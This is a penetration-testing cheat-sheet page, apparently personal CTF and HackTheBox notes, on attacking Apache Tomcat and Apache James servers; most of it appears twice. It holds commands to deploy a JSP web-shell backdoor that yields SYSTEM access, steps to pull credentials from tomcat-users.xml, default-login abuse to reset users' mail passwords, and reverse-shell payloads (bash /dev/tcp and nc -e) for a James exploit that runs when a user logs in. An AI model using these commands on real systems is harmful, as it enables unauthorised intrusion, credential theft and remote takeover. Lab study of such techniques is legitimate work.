Apache

Home Directory

http://$IP/~mike
Apache may be configured to give users Home directory
https://httpd.apache.org/docs/2.4/howto/public_html.html

FreeBSD Apache

https://blog.codeasite.com/how-do-i-find-apache-http-server-log-files/

/usr/local/www/apache24/data/
/var/log/httpd-error.log
/var/log/httpd-access.log

Tomcat

Password is sometimes kept:
Directory where tomcat is installed
Directory starting with tomcat in /etc/
'tomcat-users.xml'

Example: /etc/tomcat7/tomcat-users.xml
Check: cat /etc/passwd .. see where tomcat profile lives

tomcatWarDeployer

Vuln: Apache Tomcat/7.0.88
REF: JerryHTB
https://github.com/mgeeky/tomcatWarDeployer
git clone https://github.com/mgeeky/tomcatWarDeployer.git

Example: 
> python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

python error: no module named 'mechanize'
>> sudo apt install python-pip
>> pip install mechanize

Again with Creds:
>> sudo python ./tomcatWarDeployer.py -v -x --user=tomcat --pass=s3cret -n hello2 -p 4449 -H 10.10.14.189 10.10.10.95:8080

==== JSP Backdoor ====
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/hello2/
INFO: 
Happy pwning. Here take that password for web shell: '8EWh0JeCrmN0'
INFO: ------------------------------------------------------------

SUCCESS!!!!!


http://10.10.10.95:8080/hello2/
8EWh0JeCrmN0

> whoami
nt authority\system

Config Password


more C:\conf\tomcat-users.xml
more C:\apache-tomcat-7.0.88\tomcat-users.xml

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
   <user username="tomcat" password="s3cret" roles="tomcat, manager-gui"/>
   <user username="admin" password="admin" roles="role1, manager-status"/>
   <user username="jerry" password="tomcat" roles="role1, manager-status"/>
</tomcat-users>

Apache James Server 2.3.2

Java Apache Mail Enterprise Server (JAMES)
- Open source SMTP and POP3 mail transfer agent and NNTP news server
- https://james.apache.org/
- Default Login: root:root
Connect and Reset user-email password
Then use Thunderbird email to look for clues

nc $IP 4555
admin:admin ..fail
root:root   ..ok
help
listusers
setpassword admin password
setpassword mindy password  ..next use thunderbird to read emails

Exploit:

-------------------------
searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'

nc -nvlp 4444
python 35513.py $IP
ssh user@server  ..to pop the exploit

-------------------------
james will 
adduser ../../../etc/bash_completion.d
sends email to directory with our payload
when somebody logs in, payload gets executed

Previous04 WebApps NextBlogs

Last updated 2 years ago

Was this helpful?

Password is sometimes kept: Directory where tomcat is installed Directory starting with tomcat in /etc/ 'tomcat-users.xml' Example: /etc/tomcat7/tomcat-users.xml Check: cat /etc/passwd .. see where tomcat profile lives

tomcatWarDeployer

Example: 
> python tomcatWarDeployer.py -v -x -p 4449 -H 192.168.56.102 192.168.56.100:8080

python error: no module named 'mechanize'
>> sudo apt install python-pip
>> pip install mechanize

Again with Creds:
>> sudo python ./tomcatWarDeployer.py -v -x --user=tomcat --pass=s3cret -n hello2 -p 4449 -H 10.10.14.189 10.10.10.95:8080

==== JSP Backdoor ====
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/hello2/
INFO: 
Happy pwning. Here take that password for web shell: '8EWh0JeCrmN0'
INFO: ------------------------------------------------------------

SUCCESS!!!!!


http://10.10.10.95:8080/hello2/
8EWh0JeCrmN0

> whoami
nt authority\system

Config Password


more C:\conf\tomcat-users.xml
more C:\apache-tomcat-7.0.88\tomcat-users.xml

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
   <user username="tomcat" password="s3cret" roles="tomcat, manager-gui"/>
   <user username="admin" password="admin" roles="role1, manager-status"/>
   <user username="jerry" password="tomcat" roles="role1, manager-status"/>
</tomcat-users>

Apache James Server 2.3.2

Java Apache Mail Enterprise Server (JAMES)

Open source SMTP and POP3 mail transfer agent and NNTP news server
https://james.apache.org/
Default Login: root:root

Connect and Reset user-email password

Then use Thunderbird email to look for clues

nc $IP 4555
admin:admin ..fail
root:root   ..ok
help
listusers
setpassword admin password
setpassword mindy password  ..next use thunderbird to read emails

Exploit:

-------------------------
searchsploit james
searchsploit -m linux/remote/35513.py

vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &'

nc -nvlp 4444
python 35513.py $IP
ssh user@server  ..to pop the exploit

-------------------------
james will 
adduser ../../../etc/bash_completion.d
sends email to directory with our payload
when somebody logs in, payload gets executed